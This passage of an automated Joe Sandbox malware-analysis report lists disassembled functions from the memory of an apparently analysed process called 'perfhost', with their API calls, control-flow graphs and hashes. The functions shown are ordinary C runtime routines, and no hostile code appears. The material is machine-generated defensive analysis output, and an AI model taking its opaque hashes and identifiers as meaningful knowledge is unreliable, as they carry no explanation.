                                        control_flow_graph 657 7a24ff-7a2513 658 7a2581-7a2589 657->658 659 7a2515-7a251a 657->659 660 7a258b-7a258e 658->660 661 7a25d0-7a25e8 call 7a2672 658->661 659->658 662 7a251c-7a2521 659->662 660->661 663 7a2590-7a25cd call 7a2096 * 4 660->663 670 7a25eb-7a25f2 661->670 662->658 665 7a2523-7a2526 662->665 663->661 665->658 668 7a2528-7a2530 665->668 671 7a254a-7a2552 668->671 672 7a2532-7a2535 668->672 676 7a2611-7a2615 670->676 677 7a25f4-7a25f8 670->677 674 7a256c-7a2580 call 7a2096 * 2 671->674 675 7a2554-7a2557 671->675 672->671 678 7a2537-7a2549 call 7a2096 call 7a3073 672->678 674->658 675->674 683 7a2559-7a256b call 7a2096 call 7a3171 675->683 684 7a262d-7a2639 676->684 685 7a2617-7a261c 676->685 679 7a25fa-7a25fd 677->679 680 7a260e 677->680 678->671 679->680 687 7a25ff-7a260d call 7a2096 * 2 679->687 680->676 683->674 684->670 694 7a263b-7a2648 call 7a2096 684->694 691 7a262a 685->691 692 7a261e-7a2621 685->692 687->680 691->684 692->691 700 7a2623-7a2629 call 7a2096 692->700 700->691
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 007A2543
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3090
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30A2
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30B4
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30C6
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30D8
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30EA
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30FC
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A310E
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3120
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3132
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3144
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3156
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3168
                                        • _free.LIBCMT ref: 007A2538
                                          • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                          • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                        • _free.LIBCMT ref: 007A255A
                                        • _free.LIBCMT ref: 007A256F
                                        • _free.LIBCMT ref: 007A257A
                                        • _free.LIBCMT ref: 007A259C
                                        • _free.LIBCMT ref: 007A25AF
                                        • _free.LIBCMT ref: 007A25BD
                                        • _free.LIBCMT ref: 007A25C8
                                        • _free.LIBCMT ref: 007A2600
                                        • _free.LIBCMT ref: 007A2607
                                        • _free.LIBCMT ref: 007A2624
                                        • _free.LIBCMT ref: 007A263C
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: dd8c30027e788ff315326a360bc34489a4947c304b02b35e51587f5636727dad
                                        • Instruction ID: dafd9618f2d771c123102158a0e78d17cf2491fac3ed14588e1fc89b0e8e386b
                                        • Opcode Fuzzy Hash: dd8c30027e788ff315326a360bc34489a4947c304b02b35e51587f5636727dad
                                        • Instruction Fuzzy Hash: C4316A71A00301DFEB31AA3CD809B57B3E9BB82311F204669F46AD7152DE78ED92CB50
                                        Function 007A7B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1160 7a7b9c-7a7bf9 GetConsoleCP 1161 7a7bff-7a7c1b 1160->1161 1162 7a7d3c-7a7d4e call 7a4c0d 1160->1162 1164 7a7c1d-7a7c34 1161->1164 1165 7a7c36-7a7c47 call 7a304d 1161->1165 1167 7a7c70-7a7c7f call 7a7937 1164->1167 1172 7a7c49-7a7c4c 1165->1172 1173 7a7c6d-7a7c6f 1165->1173 1167->1162 1174 7a7c85-7a7ca5 WideCharToMultiByte 1167->1174 1175 7a7c52-7a7c64 call 7a7937 1172->1175 1176 7a7d13-7a7d32 1172->1176 1173->1167 1174->1162 1177 7a7cab-7a7cc1 WriteFile 1174->1177 1175->1162 1182 7a7c6a-7a7c6b 1175->1182 1176->1162 1180 7a7cc3-7a7cd4 1177->1180 1181 7a7d34-7a7d3a GetLastError 1177->1181 1180->1162 1183 7a7cd6-7a7cda 1180->1183 1181->1162 1182->1174 1184 7a7d08-7a7d0b 1183->1184 1185 7a7cdc-7a7cfa WriteFile 1183->1185 1184->1161 1187 7a7d11 1184->1187 1185->1181 1186 7a7cfc-7a7d00 1185->1186 1186->1162 1188 7a7d02-7a7d05 1186->1188 1187->1162 1188->1184
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007A8311,?,00000000,?,00000000,00000000), ref: 007A7BDE
                                        • __fassign.LIBCMT ref: 007A7C59
                                        • __fassign.LIBCMT ref: 007A7C74
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 007A7C9A
                                        • WriteFile.KERNEL32(?,?,00000000,007A8311,00000000,?,?,?,?,?,?,?,?,?,007A8311,?), ref: 007A7CB9
                                        • WriteFile.KERNEL32(?,?,00000001,007A8311,00000000,?,?,?,?,?,?,?,?,?,007A8311,?), ref: 007A7CF2
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: e76a990ad7823ac8d5fea4256fe0a354a67385d9aeb23aa01fd0ed9021df75f2
                                        • Instruction ID: 246170436ead5d8511690fadd615a4a3d43d7dbf7d95c1726b1802b167a3b3fb
                                        • Opcode Fuzzy Hash: e76a990ad7823ac8d5fea4256fe0a354a67385d9aeb23aa01fd0ed9021df75f2
                                        • Instruction Fuzzy Hash: E1510C71A04209EFCF14CFA8DC45AEEBBF8EF4A300F14465AE555E7291D7349941CBA0
                                        Function 007A3216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1189 7a3216-7a3221 1190 7a32f7-7a32f9 1189->1190 1191 7a3227-7a32f4 call 7a31da * 5 call 7a2096 * 3 call 7a31da * 5 call 7a2096 * 4 1189->1191 1191->1190
                                        APIs
                                          • Part of subcall function 007A31DA: _free.LIBCMT ref: 007A3203
                                        • _free.LIBCMT ref: 007A3264
                                          • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                          • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                        • _free.LIBCMT ref: 007A326F
                                        • _free.LIBCMT ref: 007A327A
                                        • _free.LIBCMT ref: 007A32CE
                                        • _free.LIBCMT ref: 007A32D9
                                        • _free.LIBCMT ref: 007A32E4
                                        • _free.LIBCMT ref: 007A32EF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                        • Instruction ID: f241df92469c81de2a73d508306c3f53f1f49a5bc3f5d03d825d4e06cbeca43e
                                        • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                        • Instruction Fuzzy Hash: 64111F72A41B08EAD530FFB0CC0BFCB779C6F87740F404A15BAAE66052DA69B6058650
                                        Function 007A44E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1226 7a44e9-7a4502 1227 7a4518-7a451d 1226->1227 1228 7a4504-7a4514 call 7a49fc 1226->1228 1230 7a452a-7a454e MultiByteToWideChar 1227->1230 1231 7a451f-7a4527 1227->1231 1228->1227 1235 7a4516 1228->1235 1233 7a46e1-7a46f4 call 7a4c0d 1230->1233 1234 7a4554-7a4560 1230->1234 1231->1230 1236 7a4562-7a4573 1234->1236 1237 7a45b4 1234->1237 1235->1227 1240 7a4592-7a45a3 call 7a32fa 1236->1240 1241 7a4575-7a4584 call 7a4da0 1236->1241 1239 7a45b6-7a45b8 1237->1239 1244 7a45be-7a45d1 MultiByteToWideChar 1239->1244 1245 7a46d6 1239->1245 1240->1245 1251 7a45a9 1240->1251 1241->1245 1254 7a458a-7a4590 1241->1254 1244->1245 1248 7a45d7-7a45f2 call 7a2317 1244->1248 1249 7a46d8-7a46df call 7a361c 1245->1249 1248->1245 1258 7a45f8-7a45ff 1248->1258 1249->1233 1255 7a45af-7a45b2 1251->1255 1254->1255 1255->1239 1259 7a4639-7a4645 1258->1259 1260 7a4601-7a4606 1258->1260 1261 7a4691 1259->1261 1262 7a4647-7a4658 1259->1262 1260->1249 1263 7a460c-7a460e 1260->1263 1266 7a4693-7a4695 1261->1266 1264 7a465a-7a4669 call 7a4da0 1262->1264 1265 7a4673-7a4684 call 7a32fa 1262->1265 1263->1245 1267 7a4614-7a462e call 7a2317 1263->1267 1270 7a46cf-7a46d5 call 7a361c 1264->1270 1280 7a466b-7a4671 1264->1280 1265->1270 1282 7a4686 1265->1282 1266->1270 1271 7a4697-7a46b0 call 7a2317 1266->1271 1267->1249 1279 7a4634 1267->1279 1270->1245 1271->1270 1283 7a46b2-7a46b9 1271->1283 1279->1245 1284 7a468c-7a468f 1280->1284 1282->1284 1285 7a46bb-7a46bc 1283->1285 1286 7a46f5-7a46fb 1283->1286 1284->1266 1287 7a46bd-7a46cd WideCharToMultiByte 1285->1287 1286->1287 1287->1270 1288 7a46fd-7a4704 call 7a361c 1287->1288 1288->1249
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,007A473A,?,?,00000000), ref: 007A4543
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,007A473A,?,?,00000000,?,?,?), ref: 007A45C9
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007A46C3
                                        • __freea.LIBCMT ref: 007A46D0
                                          • Part of subcall function 007A32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007A332C
                                        • __freea.LIBCMT ref: 007A46D9
                                        • __freea.LIBCMT ref: 007A46FE
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: fa38ebf12fddf842cef18dfa69dbe65d7a03b299fbd49f59af8a837b2f8fb1a0
                                        • Instruction ID: 9bbac4fd9baa20206e2fedbf3e66ac50e8c9c7eec56367dccf92f5c3ee01465a
                                        • Opcode Fuzzy Hash: fa38ebf12fddf842cef18dfa69dbe65d7a03b299fbd49f59af8a837b2f8fb1a0
                                        • Instruction Fuzzy Hash: C351BF72600216ABDF259E64CC45EBB77A9EBC7750F194728F804D7190EBBEDCA0C650
                                        Function 007A185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1291 7a185b-7a186f GetLastError 1292 7a187d-7a188f call 7a2039 1291->1292 1293 7a1871-7a187b call 7a2206 1291->1293 1299 7a189a-7a18a8 call 7a225c 1292->1299 1300 7a1891 1292->1300 1293->1292 1298 7a18c6-7a18d1 SetLastError 1293->1298 1305 7a18aa-7a18ab 1299->1305 1306 7a18ad-7a18c4 call 7a1797 call 7a2096 1299->1306 1302 7a1892-7a1898 call 7a2096 1300->1302 1308 7a18d2-7a18de SetLastError call 7a1ff6 1302->1308 1305->1302 1306->1298 1306->1308
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 4467cafea4201b5eecfbd479b49a99fa8087c0e4d35d87314b864dfcb99e9eb5
                                        • Instruction ID: 132939262292cc493eddd3b4fdff1972cf8e4ef41808dbfbc9b38fb64f2c98da
                                        • Opcode Fuzzy Hash: 4467cafea4201b5eecfbd479b49a99fa8087c0e4d35d87314b864dfcb99e9eb5
                                        • Instruction Fuzzy Hash: A0F0A432104601AAE2522739AC0EF2B165A9BC3771FA58338F915A2292FF6D8C43C255
                                        Function 007A3FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1315 7a3fc2-7a3fea GetModuleHandleExW 1316 7a400f-7a4013 1315->1316 1317 7a3fec-7a3fff GetProcAddress 1315->1317 1320 7a401e-7a402b call 7a4c0d 1316->1320 1321 7a4015-7a4018 FreeLibrary 1316->1321 1318 7a400e 1317->1318 1319 7a4001-7a400c 1317->1319 1318->1316 1319->1318 1321->1320
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007A3F73,00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002), ref: 007A3FE2
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007A3FF5
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,007A3F73,00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000), ref: 007A4018
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 34465fac112fdbee1812e5c963038116edc021c89f6f7f3526255f9f2b1b5dbf
                                        • Instruction ID: 9944c6c05588f38158551297475411c90f676ab8b8098a6c35d4fd70bafb08e8
                                        • Opcode Fuzzy Hash: 34465fac112fdbee1812e5c963038116edc021c89f6f7f3526255f9f2b1b5dbf
                                        • Instruction Fuzzy Hash: 12F0C230A0021CBBCB549F94DC09BAEBFB5EFC5711F0081A8F805A2150DBBD8E40DB95
                                        Function 007A18DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1325 7a18df-7a18f6 GetLastError 1326 7a18f8-7a1902 call 7a2206 1325->1326 1327 7a1904-7a1916 call 7a2039 1325->1327 1326->1327 1332 7a1955-7a195c SetLastError 1326->1332 1333 7a1918 1327->1333 1334 7a1921-7a192f call 7a225c 1327->1334 1337 7a195e-7a1963 1332->1337 1335 7a1919-7a191f call 7a2096 1333->1335 1341 7a1931-7a1932 1334->1341 1342 7a1934-7a194a call 7a1797 call 7a2096 1334->1342 1343 7a194c-7a1953 SetLastError 1335->1343 1341->1335 1342->1332 1342->1343 1343->1337
                                        APIs
                                        • GetLastError.KERNEL32(00000008,?,?,007A15D8,007A3CBB,?,007A1D2A,?,?,00000000), ref: 007A18E4
                                        • _free.LIBCMT ref: 007A1919
                                        • _free.LIBCMT ref: 007A1940
                                        • SetLastError.KERNEL32(00000000,?,007A1D2A,?,?,00000000), ref: 007A194D
                                        • SetLastError.KERNEL32(00000000,?,007A1D2A,?,?,00000000), ref: 007A1956
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 1e8fe56cc9b788ed1329013809c06cd1cb6710cfe1d41e9d046fb15c8df3e896
                                        • Instruction ID: fc912974f1a3a3e7d7c9a20720a8ff23ef341c18a4d9ba4f2d03a9d596c4fd9c
                                        • Opcode Fuzzy Hash: 1e8fe56cc9b788ed1329013809c06cd1cb6710cfe1d41e9d046fb15c8df3e896
                                        • Instruction Fuzzy Hash: F2012632100201BBB21226386C99F3B121D9BC3374F614328F510A2193FB2E9807C110
                                        Function 007A3171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1348 7a3171-7a317c 1349 7a317e-7a3186 1348->1349 1350 7a31d7-7a31d9 1348->1350 1351 7a3188-7a318e call 7a2096 1349->1351 1352 7a318f-7a3198 1349->1352 1351->1352 1354 7a319a-7a31a0 call 7a2096 1352->1354 1355 7a31a1-7a31aa 1352->1355 1354->1355 1358 7a31ac-7a31b2 call 7a2096 1355->1358 1359 7a31b3-7a31bc 1355->1359 1358->1359 1361 7a31be-7a31c4 call 7a2096 1359->1361 1362 7a31c5-7a31ce 1359->1362 1361->1362 1362->1350 1366 7a31d0-7a31d6 call 7a2096 1362->1366 1366->1350
                                        APIs
                                        • _free.LIBCMT ref: 007A3189
                                          • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                          • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                        • _free.LIBCMT ref: 007A319B
                                        • _free.LIBCMT ref: 007A31AD
                                        • _free.LIBCMT ref: 007A31BF
                                        • _free.LIBCMT ref: 007A31D1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ccf1dd2158c66a5d2a997f8843cd61abf4f49f900c7e2c40872721f126a38d71
                                        • Instruction ID: a87e4c1d5cc298d7e0840a416210c5a83eee00a6fb7cfd957cf3b1fe58773bda
                                        • Opcode Fuzzy Hash: ccf1dd2158c66a5d2a997f8843cd61abf4f49f900c7e2c40872721f126a38d71
                                        • Instruction Fuzzy Hash: FAF01D32605604EB8634EF68F98AC1B73D9BA867117644A09F559D7602CB3CFD818AE8
                                        Function 007A34FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1370 7a34ff-7a3524 call 79fd79 1373 7a3531-7a3557 MultiByteToWideChar 1370->1373 1374 7a3526-7a352e 1370->1374 1375 7a355d-7a3569 1373->1375 1376 7a35f6-7a35fa 1373->1376 1374->1373 1377 7a356b-7a357c 1375->1377 1378 7a35b5 1375->1378 1379 7a35fc-7a35ff 1376->1379 1380 7a3606-7a361b call 7a4c0d 1376->1380 1381 7a357e-7a358d call 7a4da0 1377->1381 1382 7a3597-7a35a8 call 7a32fa 1377->1382 1384 7a35b7-7a35b9 1378->1384 1379->1380 1389 7a35ef-7a35f5 call 7a361c 1381->1389 1395 7a358f-7a3595 1381->1395 1382->1389 1396 7a35aa 1382->1396 1388 7a35bb-7a35dd call 7a66d0 MultiByteToWideChar 1384->1388 1384->1389 1388->1389 1398 7a35df-7a35ed GetStringTypeW 1388->1398 1389->1376 1399 7a35b0-7a35b3 1395->1399 1396->1399 1398->1389 1399->1384
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 007A354C
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007A35D5
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007A35E7
                                        • __freea.LIBCMT ref: 007A35F0
                                          • Part of subcall function 007A32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007A332C
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 27b8bb10f343ce2c5c399f6cd4f947e4f460091fe088fe9845769d2b11f124eb
                                        • Instruction ID: ff4988103d8ad57797b211998575d941bb9f68003de54c6004200b0b406edc43
                                        • Opcode Fuzzy Hash: 27b8bb10f343ce2c5c399f6cd4f947e4f460091fe088fe9845769d2b11f124eb
                                        • Instruction Fuzzy Hash: 77318E72A0021AABDF259F78DC45DAE7BA5EF82310F154229FC04D7250EB39CE64CB90
                                        Function 007A218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1400 7a218b-7a219f 1401 7a21ac-7a21c7 LoadLibraryExW 1400->1401 1402 7a21a1-7a21aa 1400->1402 1404 7a21c9-7a21d2 GetLastError 1401->1404 1405 7a21f0-7a21f6 1401->1405 1403 7a2203-7a2205 1402->1403 1406 7a21e1 1404->1406 1407 7a21d4-7a21df LoadLibraryExW 1404->1407 1408 7a21f8-7a21f9 FreeLibrary 1405->1408 1409 7a21ff 1405->1409 1410 7a21e3-7a21e5 1406->1410 1407->1410 1408->1409 1411 7a2201-7a2202 1409->1411 1410->1405 1412 7a21e7-7a21ee 1410->1412 1411->1403 1412->1411
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007A15D8,00000000,00000000,?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue), ref: 007A21BD
                                        • GetLastError.KERNEL32(?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue,007B6FC4,FlsSetValue,00000000,00000364,?,007A192D), ref: 007A21C9
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue,007B6FC4,FlsSetValue,00000000), ref: 007A21D7
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: c1d02e5c0fe98fec8141f66a9459605ccf4c60eaff9844b3e125b88fc5616d74
                                        • Instruction ID: 945c0da3d4dbf269d5b32b7e312c412d66a7950c862047a5352fe2c288e7835c
                                        • Opcode Fuzzy Hash: c1d02e5c0fe98fec8141f66a9459605ccf4c60eaff9844b3e125b88fc5616d74
                                        • Instruction Fuzzy Hash: CA01FC3270122ABBC7214A6CDC44E667B98AFC7B60B214724FA15D3141C72CDD02C7F4
                                        Function 007A2DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1413 7a2ddb-7a2dff call 7a29ae 1416 7a2e0f-7a2e16 1413->1416 1417 7a2e01-7a2e0a call 7a2a21 1413->1417 1419 7a2e19-7a2e1f 1416->1419 1425 7a2fbc-7a2fcb call 7a4c0d 1417->1425 1420 7a2f0f-7a2f2e call 7a66d0 1419->1420 1421 7a2e25-7a2e31 1419->1421 1433 7a2f31-7a2f36 1420->1433 1421->1419 1423 7a2e33-7a2e39 1421->1423 1426 7a2e3f-7a2e45 1423->1426 1427 7a2f07-7a2f0a 1423->1427 1426->1427 1431 7a2e4b-7a2e57 IsValidCodePage 1426->1431 1432 7a2fbb 1427->1432 1431->1427 1434 7a2e5d-7a2e6a GetCPInfo 1431->1434 1432->1425 1435 7a2f38-7a2f3d 1433->1435 1436 7a2f6d-7a2f77 1433->1436 1437 7a2e70-7a2e91 call 7a66d0 1434->1437 1438 7a2ef4-7a2efa 1434->1438 1440 7a2f6a 1435->1440 1441 7a2f3f-7a2f45 1435->1441 1436->1433 1439 7a2f79-7a2fa0 call 7a2970 1436->1439 1452 7a2e93-7a2e9a 1437->1452 1453 7a2ee4 1437->1453 1438->1427 1444 7a2efc-7a2f02 call 7a2a21 1438->1444 1455 7a2fa1-7a2fb0 1439->1455 1440->1436 1442 7a2f5e-7a2f60 1441->1442 1446 7a2f62-7a2f68 1442->1446 1447 7a2f47-7a2f4d 1442->1447 1459 7a2fb8-7a2fb9 1444->1459 1446->1435 1446->1440 1447->1446 1451 7a2f4f-7a2f5a 1447->1451 1451->1442 1457 7a2e9c-7a2ea1 1452->1457 1458 7a2ebd-7a2ec0 1452->1458 1456 7a2ee7-7a2eef 1453->1456 1455->1455 1460 7a2fb2-7a2fb3 call 7a2a86 1455->1460 1456->1460 1457->1458 1461 7a2ea3-7a2ea9 1457->1461 1463 7a2ec5-7a2ecc 1458->1463 1459->1432 1460->1459 1465 7a2eb1-7a2eb3 1461->1465 1463->1463 1464 7a2ece-7a2ee2 call 7a2970 1463->1464 1464->1456 1467 7a2eab-7a2eb0 1465->1467 1468 7a2eb5-7a2ebb 1465->1468 1467->1465 1468->1457 1468->1458
                                        APIs
                                          • Part of subcall function 007A29AE: GetOEMCP.KERNEL32 ref: 007A29D9
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007A2C7C,?,00000000), ref: 007A2E4F
                                        • GetCPInfo.KERNEL32(00000000,|,z,?,?,?,007A2C7C,?,00000000), ref: 007A2E62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID: |,z
                                        • API String ID: 546120528-726383530
                                        • Opcode ID: ef0ac1c2610f3b93478387e2bdcced8b0d740e0c77870daa4cbc4dfa6c7431c3
                                        • Instruction ID: c92b4f024f3794bd2a1cac6a1eb3120a7f9ff3306fdc9d38b9ea3debc1c7efdd
                                        • Opcode Fuzzy Hash: ef0ac1c2610f3b93478387e2bdcced8b0d740e0c77870daa4cbc4dfa6c7431c3
                                        • Instruction Fuzzy Hash: A95116709082459EDB248F29C848ABBBBF5EFC3304F14866ED4969B153D73D9943CB90
                                        Function 007A4C0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007A4CAE
                                        • ___raise_securityfailure.LIBCMT ref: 007A4D95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: 0|
                                        • API String ID: 3761405300-1398520540
                                        • Opcode ID: 774ac7040ec613a54befba42bbca062f37d2b5ac2ea42f2b2fd4caabd56eda0a
                                        • Instruction ID: ebf407053683afc27d7a3403914fc5e4d6e1bab4b6e9e21b7b0ce35f74fa8f4a
